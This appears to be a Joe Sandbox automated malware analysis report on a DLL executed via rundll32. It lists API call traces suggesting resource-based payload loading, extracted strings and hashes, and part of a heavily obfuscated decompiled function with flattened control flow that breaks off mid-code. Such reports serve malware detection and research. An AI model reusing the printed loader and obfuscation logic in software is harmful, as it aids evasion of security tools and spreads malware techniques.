Part of subcall function 10001A7D: GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000,LdrFindResource_U,?,10001EF1,LdrFindResource_U,00000000,LdrFindResource_U), ref: 10001A8F
Part of subcall function 10001A7D: VirtualAllocExNuma.KERNEL32 ref: 10001A96

GetProcAddress.KERNEL32(00000000,00000000), ref: 10001EFC
GetProcAddress.KERNEL32(00000000,LdrAccessResource), ref: 10001F09
LdrFindResource_U.NTDLL(10000000,00000017,00000000,?), ref: 10001F29
ShowWindow.USER32(00000000,00000000), ref: 10001F39
ShowWindow.USER32(00000000,00000000), ref: 10001F3D
ShowWindow.USER32(00000000,00000000), ref: 10001F41
ShowWindow.USER32(00000000,00000000), ref: 10001F45
ShowWindow.USER32(00000000,00000000), ref: 10001F49
ShowWindow.USER32(00000000,00000000), ref: 10001F4D
ShowWindow.USER32(00000000,00000000), ref: 10001F51
ShowWindow.USER32(00000000,00000000), ref: 10001F55
ShowWindow.USER32(00000000,00000000), ref: 10001F59
ShowWindow.USER32(00000000,00000000), ref: 10001F5D
ShowWindow.USER32(00000000,00000000), ref: 10001F61
ShowWindow.USER32(00000000,00000000), ref: 10001F65
ShowWindow.USER32(00000000,00000000), ref: 10001F69
ShowWindow.USER32(00000000,00000000), ref: 10001F6D
ShowWindow.USER32(00000000,00000000), ref: 10001F71
ShowWindow.USER32(00000000,00000000), ref: 10001F75
ShowWindow.USER32(00000000,00000000), ref: 10001F79
ShowWindow.USER32(00000000,00000000), ref: 10001F7D
ShowWindow.USER32(00000000,00000000), ref: 10001F81
ShowWindow.USER32(00000000,00000000), ref: 10001F85
ShowWindow.USER32(00000000,00000000), ref: 10001F89
ShowWindow.USER32(00000000,00000000), ref: 10001F8D
ShowWindow.USER32(00000000,00000000), ref: 10001F91
ShowWindow.USER32(00000000,00000000), ref: 10001F95
ShowWindow.USER32(00000000,00000000), ref: 10001F99
ShowWindow.USER32(00000000,00000000), ref: 10001F9D
ShowWindow.USER32(00000000,00000000), ref: 10001FA1
ShowWindow.USER32(00000000,00000000), ref: 10001FA5
ShowWindow.USER32(00000000,00000000), ref: 10001FA9
ShowWindow.USER32(00000000,00000000), ref: 10001FAD
ShowWindow.USER32(00000000,00000000), ref: 10001FB1
ShowWindow.USER32(00000000,00000000), ref: 10001FB5
ShowWindow.USER32(00000000,00000000), ref: 10001FB9
ShowWindow.USER32(00000000,00000000), ref: 10001FBD
ShowWindow.USER32(00000000,00000000), ref: 10001FC1
ShowWindow.USER32(00000000,00000000), ref: 10001FC5
ShowWindow.USER32(00000000,00000000), ref: 10001FC9
ShowWindow.USER32(00000000,00000000), ref: 10001FCD
ShowWindow.USER32(00000000,00000000), ref: 10001FD1
ShowWindow.USER32(00000000,00000000), ref: 10001FD5
ShowWindow.USER32(00000000,00000000), ref: 10001FD9
ShowWindow.USER32(00000000,00000000), ref: 10001FDD
ShowWindow.USER32(00000000,00000000), ref: 10001FE1
ShowWindow.USER32(00000000,00000000), ref: 10001FE5
ShowWindow.USER32(00000000,00000000), ref: 10001FE9
ShowWindow.USER32(00000000,00000000), ref: 10001FED
ShowWindow.USER32(00000000,00000000), ref: 10001FF1
ShowWindow.USER32(00000000,00000000), ref: 10001FF5
ShowWindow.USER32(00000000,00000000), ref: 10001FF9
ShowWindow.USER32(00000000,00000000), ref: 10001FFD
ShowWindow.USER32(00000000,00000000), ref: 10002001
ShowWindow.USER32(00000000,00000000), ref: 10002005
ShowWindow.USER32(00000000,00000000), ref: 10002009
ShowWindow.USER32(00000000,00000000), ref: 1000200D
ShowWindow.USER32(00000000,00000000), ref: 10002011
ShowWindow.USER32(00000000,00000000), ref: 10002015
ShowWindow.USER32(00000000,00000000), ref: 10002019
ShowWindow.USER32(00000000,00000000), ref: 1000201D
ShowWindow.USER32(00000000,00000000), ref: 10002021
ShowWindow.USER32(00000000,00000000), ref: 10002025
ShowWindow.USER32(00000000,00000000), ref: 10002029
ShowWindow.USER32(00000000,00000000), ref: 1000202D
ShowWindow.USER32(00000000,00000000), ref: 10002031
ShowWindow.USER32(00000000,00000000), ref: 10002035
ShowWindow.USER32(00000000,00000000), ref: 10002039
ShowWindow.USER32(00000000,00000000), ref: 1000203D
ShowWindow.USER32(00000000,00000000), ref: 10002041
ShowWindow.USER32(00000000,00000000), ref: 10002045
ShowWindow.USER32(00000000,00000000), ref: 10002049
ShowWindow.USER32(00000000,00000000), ref: 1000204D
ShowWindow.USER32(00000000,00000000), ref: 10002051
ShowWindow.USER32(00000000,00000000), ref: 10002055
ShowWindow.USER32(00000000,00000000), ref: 10002059
ShowWindow.USER32(00000000,00000000), ref: 1000205D
ShowWindow.USER32(00000000,00000000), ref: 10002061
ShowWindow.USER32(00000000,00000000), ref: 10002065
ShowWindow.USER32(00000000,00000000), ref: 10002069
ShowWindow.USER32(00000000,00000000), ref: 1000206D
ShowWindow.USER32(00000000,00000000), ref: 10002071
ShowWindow.USER32(00000000,00000000), ref: 10002075
ShowWindow.USER32(00000000,00000000), ref: 10002079
ShowWindow.USER32(00000000,00000000), ref: 1000207D
ShowWindow.USER32(00000000,00000000), ref: 10002081
ShowWindow.USER32(00000000,00000000), ref: 10002085
ShowWindow.USER32(00000000,00000000), ref: 10002089
ShowWindow.USER32(00000000,00000000), ref: 1000208D
ShowWindow.USER32(00000000,00000000), ref: 10002091
ShowWindow.USER32(00000000,00000000), ref: 10002095
ShowWindow.USER32(00000000,00000000), ref: 10002099
ShowWindow.USER32(00000000,00000000), ref: 1000209D
ShowWindow.USER32(00000000,00000000), ref: 100020A1
ShowWindow.USER32(00000000,00000000), ref: 100020A5
ShowWindow.USER32(00000000,00000000), ref: 100020A9
ShowWindow.USER32(00000000,00000000), ref: 100020AD
ShowWindow.USER32(00000000,00000000), ref: 100020B1
ShowWindow.USER32(00000000,00000000), ref: 100020B5
ShowWindow.USER32(00000000,00000000), ref: 100020B9
ShowWindow.USER32(00000000,00000000), ref: 100020BD
ShowWindow.USER32(00000000,00000000), ref: 100020C1
ShowWindow.USER32(00000000,00000000), ref: 100020C5
LdrAccessResource.NTDLL(10000000,?,?,?), ref: 100020DB
WriteFileGather.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 100020E6
VirtualAlloc.KERNELBASE(00000000,?,00000000,00000000), ref: 10002119
MessageBoxA.USER32 ref: 10002172

Strings

LdrAccessResource, xrefs: 10001EFE
MFC42.DLL, xrefs: 10001EAA
k1>@dY0V<o)afFNz7v68r^Kn6)h)OGcSc, xrefs: 10002133
ntdll.dll, xrefs: 10001EC2
Control_RunDLL, xrefs: 10002159
LdrFindResource_U, xrefs: 10001EDD, 10001EE4, 10001EEB

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ShowWindow$AddressAllocLibraryLoadProcVirtual$AccessCurrentFileFindGatherMessageNumaProcessResourceResource_Write_strlen
String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$MFC42.DLL$k1>@dY0V<o)afFNz7v68r^Kn6)h)OGcSc$ntdll.dll
API String ID: 1083314109-3402274389
Opcode ID: 554e6fde4c1d1f79f28124b122aaa560f5ca8abd828a0db746064c1df19a2dc9
Instruction ID: cb1ea1c1361b03dfa0b29133f2aa3901bb47fc6e60d4c354bfdb6088dc7855a5
Opcode Fuzzy Hash: 554e6fde4c1d1f79f28124b122aaa560f5ca8abd828a0db746064c1df19a2dc9
Instruction Fuzzy Hash: 7A9116E1D0022C7EF621ABB28DC9DBF6E6CDE051E8B512817B50A921129E389D05CEF4

Uniqueness

Uniqueness Score: -1.00%

Function 00202C63, Relevance: 54.9, Strings: 43, Instructions: 1125
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00202C63() {
				char _v68;
				signed int _v72;
				char _v80;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _v112;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				unsigned int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				unsigned int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				unsigned int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				unsigned int _v596;
				signed int _v600;
				signed int _t1135;
				signed int _t1138;
				signed int _t1140;
				signed int _t1144;
				signed int _t1172;
				void* _t1186;
				signed int _t1199;
				void* _t1213;
				signed int _t1218;
				signed int _t1224;
				signed int _t1257;
				signed int _t1336;
				signed int _t1340;
				signed int _t1348;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1366;
				signed int _t1367;
				signed int _t1368;
				signed int _t1369;
				signed int _t1370;
				signed int _t1371;
				signed int _t1372;
				void* _t1384;
				signed int _t1385;
				void* _t1387;
				void* _t1389;
				void* _t1391;
				void* _t1392;
				void* _t1393;

				_t1387 = (_t1385 & 0xfffffff8) - 0x258;
				_v596 = 0x54d1;
				_t1225 = 0x2a32d0a;
				_t1351 = 0x66;
				_v596 = _v596 / _t1351;
				_t1352 = 0x6b;
				_v596 = _v596 / _t1352;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x00002830;
				_v416 = 0xcdcb;
				_v416 = _v416 + 0x2116;
				_t1353 = 0x1f;
				_v416 = _v416 * 0x30;
				_v416 = _v416 ^ 0x002c9323;
				_v488 = 0x9982;
				_v488 = _v488 | 0x10c88477;
				_v488 = _v488 ^ 0xa41c88c2;
				_v488 = _v488 / _t1353;
				_v488 = _v488 ^ 0x05d51165;
				_v496 = 0x77c8;
				_v496 = _v496 >> 3;
				_t1354 = 0xa;
				_v496 = _v496 / _t1354;
				_v496 = _v496 << 7;
				_v496 = _v496 ^ 0x0000cb31;
				_v232 = 0x48c9;
				_v232 = _v232 << 0xe;
				_v232 = _v232 ^ 0x12321472;
				_v360 = 0x3c3d;
				_t1218 = 5;
				_v360 = _v360 / _t1218;
				_v360 = _v360 * 0x2f;
				_v360 = _v360 ^ 0x000268e3;
				_v176 = 0x1856;
				_v176 = _v176 * 0x70;
				_v176 = _v176 ^ 0x000ab2a8;
				_v264 = 0xa86e;
				_v264 = _v264 + 0xffff13b3;
				_v264 = _v264 ^ 0xffffefbf;
				_v376 = 0x5423;
				_v376 = _v376 + 0xffffd432;
				_v376 = _v376 | 0x32249576;
				_v376 = _v376 ^ 0x3224c778;
				_v248 = 0xe66f;
				_v248 = _v248 >> 9;
				_v248 = _v248 ^ 0x000023ba;
				_v308 = 0x205b;
				_v308 = _v308 + 0xffff1f5e;
				_v308 = _v308 << 8;
				_v308 = _v308 ^ 0xff3fb884;
				_v484 = 0x592;
				_v484 = _v484 + 0xffffd519;
				_v484 = _v484 | 0x759ff25f;
				_v484 = _v484 + 0x87eb;
				_v484 = _v484 ^ 0x00008574;
				_v168 = 0x6ddb;
				_v168 = _v168 | 0x6e943d07;
				_v168 = _v168 ^ 0x6e944d9a;
				_v200 = 0xd6b0;
				_v200 = _v200 + 0xffff46fa;
				_v200 = _v200 ^ 0x00002650;
				_v452 = 0x246b;
				_v452 = _v452 ^ 0x586b7630;
				_v452 = _v452 << 0xc;
				_v452 = _v452 + 0xd57e;
				_v452 = _v452 ^ 0xb526cd97;
				_v348 = 0xfa69;
				_t1340 = 0x52;
				_t1355 = 0x65;
				_v348 = _v348 * 0x65;
				_v348 = _v348 | 0xab757825;
				_v348 = _v348 ^ 0xab77a96f;
				_v324 = 0xa741;
				_v324 = _v324 ^ 0x4f747397;
				_v324 = _v324 / _t1340;
				_v324 = _v324 ^ 0x00f83cd8;
				_v296 = 0x788d;
				_v296 = _v296 ^ 0x0ef2968d;
				_v296 = _v296 ^ 0x495ddb9a;
				_v296 = _v296 ^ 0x47af2616;
				_v220 = 0xb89f;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 ^ 0x000056af;
				_v520 = 0x12ce;
				_v520 = _v520 + 0xe747;
				_v520 = _v520 << 7;
				_v520 = _v520 | 0x5b07959e;
				_v520 = _v520 ^ 0x5b7fa869;
				_v208 = 0xa95c;
				_v208 = _v208 + 0xffff5ee2;
				_v208 = _v208 ^ 0x00000a9e;
				_v172 = 0xa2eb;
				_v172 = _v172 * 0x79;
				_v172 = _v172 ^ 0x004d63d4;
				_v180 = 0x98a7;
				_v180 = _v180 | 0x8ae8094c;
				_v180 = _v180 ^ 0x8ae8e600;
				_v424 = 0xd5a0;
				_v424 = _v424 << 5;
				_v424 = _v424 / _t1355;
				_v424 = _v424 ^ 0x00007145;
				_v392 = 0x548d;
				_v392 = _v392 + 0xffff9ec2;
				_v392 = _v392 + 0xffffa1fb;
				_v392 = _v392 ^ 0xffff9dba;
				_v340 = 0x6e45;
				_t1356 = 0x16;
				_v340 = _v340 / _t1356;
				_v340 = _v340 + 0xffff4bce;
				_v340 = _v340 ^ 0xffff3c02;
				_v536 = 0xbde4;
				_v536 = _v536 * 0x7f;
				_v536 = _v536 ^ 0x574a5eba;
				_v536 = _v536 << 0xd;
				_v536 = _v536 ^ 0x8d54c30e;
				_v284 = 0x7ef6;
				_v284 = _v284 + 0x9ef0;
				_v284 = _v284 ^ 0x00015c31;
				_v408 = 0xc211;
				_v408 = _v408 ^ 0x3543d7c0;
				_v408 = _v408 * 0x2b;
				_v408 = _v408 ^ 0xf244fbb0;
				_v588 = 0x856b;
				_v588 = _v588 ^ 0xfc1cd259;
				_v588 = _v588 ^ 0x7d294751;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 ^ 0x000240de;
				_v508 = 0x646a;
				_t1357 = 0x1e;
				_v508 = _v508 / _t1357;
				_t1358 = 0x35;
				_v508 = _v508 / _t1358;
				_v508 = _v508 * 0x5a;
				_v508 = _v508 ^ 0x00003cc0;
				_v472 = 0x196b;
				_v472 = _v472 * 0x16;
				_v472 = _v472 + 0x8cdc;
				_v472 = _v472 ^ 0x6344539c;
				_v472 = _v472 ^ 0x6346dd33;
				_v212 = 0xb705;
				_v212 = _v212 << 7;
				_v212 = _v212 ^ 0x005bff43;
				_v312 = 0xb48f;
				_v312 = _v312 + 0xffff701f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 ^ 0x00001302;
				_v480 = 0xed6e;
				_v480 = _v480 | 0x6be3eced;
				_v480 = _v480 + 0x4979;
				_v480 = _v480 ^ 0x6be47f6f;
				_v204 = 0xd35b;
				_v204 = _v204 >> 8;
				_v204 = _v204 ^ 0x00000622;
				_v456 = 0xd2fa;
				_v456 = _v456 << 3;
				_v456 = _v456 + 0xffffd4b1;
				_v456 = _v456 << 4;
				_v456 = _v456 ^ 0x0066f5d7;
				_v464 = 0x5ee1;
				_v464 = _v464 >> 9;
				_v464 = _v464 | 0xf1defbea;
				_v464 = _v464 ^ 0xf1de88d3;
				_v304 = 0x5962;
				_v304 = _v304 ^ 0xf5db8de9;
				_v304 = _v304 | 0xcdcbde78;
				_v304 = _v304 ^ 0xfddba732;
				_v196 = 0xf258;
				_v196 = _v196 << 7;
				_v196 = _v196 ^ 0x007971a7;
				_v448 = 0xfcbd;
				_v448 = _v448 | 0x39b7afc5;
				_v448 = _v448 * 0x70;
				_v448 = _v448 | 0x0e40c0bc;
				_v448 = _v448 ^ 0x4e7fac25;
				_v412 = 0x82bf;
				_v412 = _v412 | 0xb02f6e2d;
				_v412 = _v412 + 0xffff8626;
				_v412 = _v412 ^ 0xb02f1cac;
				_v396 = 0xa4bf;
				_v396 = _v396 ^ 0xb063c23f;
				_v396 = _v396 >> 0xf;
				_v396 = _v396 ^ 0x00011327;
				_v592 = 0x3de9;
				_v592 = _v592 + 0xffff189b;
				_v592 = _v592 * 0x3e;
				_v592 = _v592 + 0xffff8de2;
				_v592 = _v592 ^ 0xffd6d64a;
				_v404 = 0x86b0;
				_v404 = _v404 >> 5;
				_v404 = _v404 | 0x66bae114;
				_v404 = _v404 ^ 0x66bacebe;
				_v268 = 0x5937;
				_v268 = _v268 + 0xb57c;
				_v268 = _v268 ^ 0x00015145;
				_v280 = 0x9a1f;
				_v280 = _v280 + 0xffffa2eb;
				_v280 = _v280 ^ 0x000041dd;
				_v572 = 0xebd0;
				_v572 = _v572 ^ 0xedb0bf00;
				_t1359 = 0x32;
				_v572 = _v572 / _t1359;
				_v572 = _v572 << 1;
				_v572 = _v572 ^ 0x09819433;
				_v468 = 0x3364;
				_v468 = _v468 + 0xffff353c;
				_v468 = _v468 + 0x9f63;
				_v468 = _v468 | 0x0336228b;
				_v468 = _v468 ^ 0x0336362e;
				_v580 = 0x8c54;
				_v580 = _v580 | 0xf7fe7ffd;
				_v580 = _v580 << 2;
				_v580 = _v580 ^ 0xdffb9211;
				_v400 = 0xc44;
				_v400 = _v400 | 0x703220aa;
				_v400 = _v400 + 0x556b;
				_v400 = _v400 ^ 0x70328daf;
				_v316 = 0xc625;
				_t1360 = 0x2f;
				_v316 = _v316 / _t1360;
				_v316 = _v316 | 0xad0f9139;
				_v316 = _v316 ^ 0xad0f9a77;
				_v352 = 0x3bfc;
				_v352 = _v352 ^ 0x3d91e4fd;
				_v352 = _v352 << 4;
				_v352 = _v352 ^ 0xd91d9102;
				_v188 = 0xbf9d;
				_v188 = _v188 ^ 0xeb169de8;
				_v188 = _v188 ^ 0xeb160ae0;
				_v272 = 0xf610;
				_v272 = _v272 >> 0xc;
				_v272 = _v272 ^ 0x000001f5;
				_v500 = 0xa952;
				_v500 = _v500 ^ 0x762f8db9;
				_t1361 = 0x7b;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 | 0x4a766c6e;
				_v500 = _v500 ^ 0xca77b322;
				_v420 = 0xb3ce;
				_v420 = _v420 | 0x5d2bbb9b;
				_v420 = _v420 + 0x97cf;
				_v420 = _v420 ^ 0x5d2c523b;
				_v276 = 0x9f6f;
				_v276 = _v276 + 0x6bc4;
				_v276 = _v276 ^ 0x00010aa4;
				_v504 = 0x2102;
				_v504 = _v504 >> 7;
				_v504 = _v504 + 0xffff0b4b;
				_v504 = _v504 << 4;
				_v504 = _v504 ^ 0xfff0cd66;
				_v320 = 0xeb7e;
				_v320 = _v320 / _t1361;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x001ed973;
				_v512 = 0x61aa;
				_v512 = _v512 | 0xfdc9feff;
				_t1362 = 0x42;
				_v512 = _v512 / _t1362;
				_v512 = _v512 ^ 0x03d81aae;
				_v540 = 0x929f;
				_t1363 = 3;
				_v540 = _v540 * 0x59;
				_v540 = _v540 ^ 0xd582cfd5;
				_v540 = _v540 + 0xffff6c6f;
				_v540 = _v540 ^ 0xd5af900c;
				_v332 = 0xd4e0;
				_v332 = _v332 | 0xf04e42e2;
				_v332 = _v332 ^ 0xcda3b68f;
				_v332 = _v332 ^ 0x3ded4bfa;
				_v192 = 0xb136;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x00000257;
				_v460 = 0xb4b8;
				_v460 = _v460 + 0xffff8599;
				_v460 = _v460 / _t1363;
				_v460 = _v460 + 0x6faa;
				_v460 = _v460 ^ 0x0000d8b1;
				_v548 = 0x6ab8;
				_t1364 = 0x7c;
				_v548 = _v548 * 0x71;
				_v548 = _v548 / _t1364;
				_v548 = _v548 << 4;
				_v548 = _v548 ^ 0x00063121;
				_v260 = 0x579;
				_v260 = _v260 >> 0xd;
				_v260 = _v260 ^ 0x00001a36;
				_v380 = 0x5d49;
				_t1365 = 0x3a;
				_v380 = _v380 * 0x2a;
				_v380 = _v380 << 0xf;
				_v380 = _v380 ^ 0xa6fd05f8;
				_v584 = 0x9575;
				_v584 = _v584 << 0xe;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 >> 9;
				_v584 = _v584 ^ 0x00001953;
				_v388 = 0x71ed;
				_v388 = _v388 | 0xfa0f4c1a;
				_v388 = _v388 * 0x21;
				_v388 = _v388 ^ 0x3bff2db3;
				_v576 = 0x40ac;
				_v576 = _v576 ^ 0x72872e3c;
				_v576 = _v576 >> 3;
				_v576 = _v576 >> 6;
				_v576 = _v576 ^ 0x00395cc8;
				_v356 = 0x9a14;
				_v356 = _v356 * 5;
				_v356 = _v356 / _t1365;
				_v356 = _v356 ^ 0x00000d15;
				_v364 = 0x97d4;
				_v364 = _v364 + 0xffff1281;
				_v364 = _v364 << 0xd;
				_v364 = _v364 ^ 0xf54ac276;
				_v568 = 0x9f15;
				_v568 = _v568 + 0xffff08f5;
				_v568 = _v568 * 0x54;
				_v568 = _v568 + 0x8411;
				_v568 = _v568 ^ 0xffe3bf59;
				_v372 = 0xb5ac;
				_v372 = _v372 | 0xef292143;
				_v372 = _v372 << 0xc;
				_v372 = _v372 ^ 0x9b5ed191;
				_v560 = 0xc079;
				_v560 = _v560 << 6;
				_v560 = _v560 | 0x75378a54;
				_v560 = _v560 + 0xffff0fb6;
				_v560 = _v560 ^ 0x7536a745;
				_v252 = 0xffdd;
				_v252 = _v252 ^ 0x94fd4b64;
				_v252 = _v252 ^ 0x94fd9346;
				_v344 = 0x2817;
				_v344 = _v344 + 0xffffb9ce;
				_v344 = _v344 >> 5;
				_v344 = _v344 ^ 0x07ffc707;
				_v544 = 0xc4c3;
				_v544 = _v544 << 4;
				_v544 = _v544 | 0xf37ee84d;
				_v544 = _v544 >> 9;
				_v544 = _v544 ^ 0x0079cb8a;
				_v244 = 0xbe83;
				_v244 = _v244 << 9;
				_v244 = _v244 ^ 0x017d70fa;
				_v552 = 0x87b1;
				_v552 = _v552 + 0xe2ec;
				_v552 = _v552 + 0xffff8757;
				_t1366 = 0x57;
				_v552 = _v552 / _t1366;
				_v552 = _v552 ^ 0x00000cf8;
				_v524 = 0x9ee8;
				_v524 = _v524 >> 0xc;
				_v524 = _v524 + 0xffffea20;
				_v524 = _v524 + 0x67c2;
				_v524 = _v524 ^ 0x0000257d;
				_v240 = 0x3e44;
				_t1367 = 0x4e;
				_v240 = _v240 * 0x26;
				_v240 = _v240 ^ 0x000944b9;
				_v184 = 0xb17e;
				_v184 = _v184 + 0xc83;
				_v184 = _v184 ^ 0x00008468;
				_v428 = 0x2247;
				_v428 = _v428 >> 6;
				_v428 = _v428 | 0xbf36a58a;
				_v428 = _v428 ^ 0xbf36942e;
				_v492 = 0xaf88;
				_v492 = _v492 | 0x489e17bf;
				_v492 = _v492 / _t1367;
				_t1368 = 0x59;
				_v492 = _v492 / _t1368;
				_v492 = _v492 ^ 0x00028cc4;
				_v236 = 0x579b;
				_v236 = _v236 | 0x958cbadb;
				_v236 = _v236 ^ 0x958cb114;
				_v528 = 0x596e;
				_t1369 = 0x25;
				_v528 = _v528 / _t1369;
				_v528 = _v528 + 0xffff0f20;
				_v528 = _v528 * 0x71;
				_v528 = _v528 ^ 0xff96cb88;
				_v384 = 0xdb4f;
				_v384 = _v384 / _t1340;
				_v384 = _v384 ^ 0x047c7efe;
				_v384 = _v384 ^ 0x047c6269;
				_v256 = 0x2cf1;
				_v256 = _v256 | 0x808b3cca;
				_v256 = _v256 ^ 0x808b1c76;
				_v300 = 0x3901;
				_t1370 = 0x6d;
				_v300 = _v300 * 0xa;
				_v300 = _v300 >> 6;
				_v300 = _v300 ^ 0x0000212b;
				_v368 = 0x796e;
				_v368 = _v368 * 0xc;
				_v368 = _v368 * 0x3e;
				_v368 = _v368 ^ 0x0160b691;
				_v444 = 0xa0b9;
				_v444 = _v444 | 0x9ca1dfa8;
				_v444 = _v444 / _t1370;
				_v444 = _v444 * 0x63;
				_v444 = _v444 ^ 0x8e437e2f;
				_v532 = 0x8c65;
				_v532 = _v532 * 0x56;
				_v532 = _v532 << 0xa;
				_v532 = _v532 * 0x21;
				_v532 = _v532 ^ 0x519e8d1f;
				_v556 = 0x4a7f;
				_v556 = _v556 << 0xf;
				_v556 = _v556 + 0xa5c2;
				_v556 = _v556 | 0xa1707f4f;
				_v556 = _v556 ^ 0xa5705fb9;
				_v436 = 0x3fda;
				_v436 = _v436 * 0x3e;
				_v436 = _v436 + 0x1364;
				_v436 = _v436 ^ 0xe1573554;
				_v436 = _v436 ^ 0xe158f097;
				_v564 = 0x6043;
				_v564 = _v564 | 0xb689377f;
				_v564 = _v564 >> 8;
				_v564 = _v564 ^ 0x2a62422c;
				_v564 = _v564 ^ 0x2ad4e10a;
				_v328 = 0x5c6e;
				_v328 = _v328 ^ 0x42ae754b;
				_v328 = _v328 + 0xbaa3;
				_v328 = _v328 ^ 0x42aeef53;
				_v228 = 0xef63;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 ^ 0x00001997;
				_v336 = 0x5044;
				_v336 = _v336 >> 0xf;
				_v336 = _v336 + 0xffffb35b;
				_v336 = _v336 ^ 0xffffef5d;
				_v440 = 0x7004;
				_v440 = _v440 * 0x7e;
				_v440 = _v440 * 0x13;
				_v440 = _v440 << 0x10;
				_v440 = _v440 ^ 0x85685bd2;
				_v164 = 0x75ea;
				_v164 = _v164 << 0xb;
				_v164 = _v164 ^ 0x03af40f2;
				_v224 = 0xc6cf;
				_v224 = _v224 << 9;
				_v224 = _v224 ^ 0x018dae64;
				_v160 = 0xb450;
				_t1371 = 0x38;
				_v160 = _v160 / _t1371;
				_v160 = _v160 ^ 0x00003b29;
				_v476 = 0xddbc;
				_v476 = _v476 ^ 0xc2407c95;
				_v476 = _v476 + 0xd5a3;
				_v476 = _v476 + 0x8192;
				_v476 = _v476 ^ 0xc241f0f2;
				_v216 = 0xdff2;
				_t1372 = 0x2c;
				_v216 = _v216 * 0x1c;
				_v216 = _v216 ^ 0x00187743;
				_v516 = 0x400b;
				_v516 = _v516 / _t1218;
				_v516 = _v516 + 0xc836;
				_v516 = _v516 >> 0xa;
				_v516 = _v516 ^ 0x00004f08;
				_v292 = 0xdc4e;
				_v292 = _v292 * 0x16;
				_v292 = _v292 * 0x7f;
				_v292 = _v292 ^ 0x09643e15;
				_v600 = 0x4d46;
				_v600 = _v600 + 0xffff0db8;
				_v600 = _v600 + 0x84f3;
				_v600 = _v600 + 0xc039;
				_v600 = _v600 ^ 0x0000d5ed;
				_v432 = 0x8bd1;
				_v432 = _v432 << 0xc;
				_v432 = _v432 + 0x8a22;
				_v432 = _v432 / _t1372;
				_v432 = _v432 ^ 0x003284c4;
				_v288 = 0x245c;
				_v288 = _v288 | 0x526859ae;
				_v288 = _v288 * 0xc;
				_v288 = _v288 ^ 0xdce5b0ef;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t1391 = _t1225 - 0x1bd1caec;
							if(_t1391 <= 0) {
							}
							L3:
							if(_t1391 == 0) {
								__eflags = E002102C3();
								if(__eflags == 0) {
									_t1135 = E00207903();
									asm("sbb ecx, ecx");
									_t1225 = ( ~_t1135 & 0x0209e55e) + 0x3544b2a;
									while(1) {
										L2:
										_t1391 = _t1225 - 0x1bd1caec;
										if(_t1391 <= 0) {
										}
										goto L3;
									}
								}
								_t1144 = E00207903();
								asm("sbb ecx, ecx");
								_t1257 =  ~_t1144 & 0x03449ef9;
								L32:
								_t1225 = _t1257 + 0xda99535;
								while(1) {
									L2:
									_t1391 = _t1225 - 0x1bd1caec;
									if(_t1391 <= 0) {
									}
									goto L54;
								}
								goto L3;
							}
							_t1392 = _t1225 - 0x10ee342e;
							if(_t1392 > 0) {
								__eflags = _t1225 - 0x15603e6b;
								if(__eflags > 0) {
									__eflags = _t1225 - 0x159448ba;
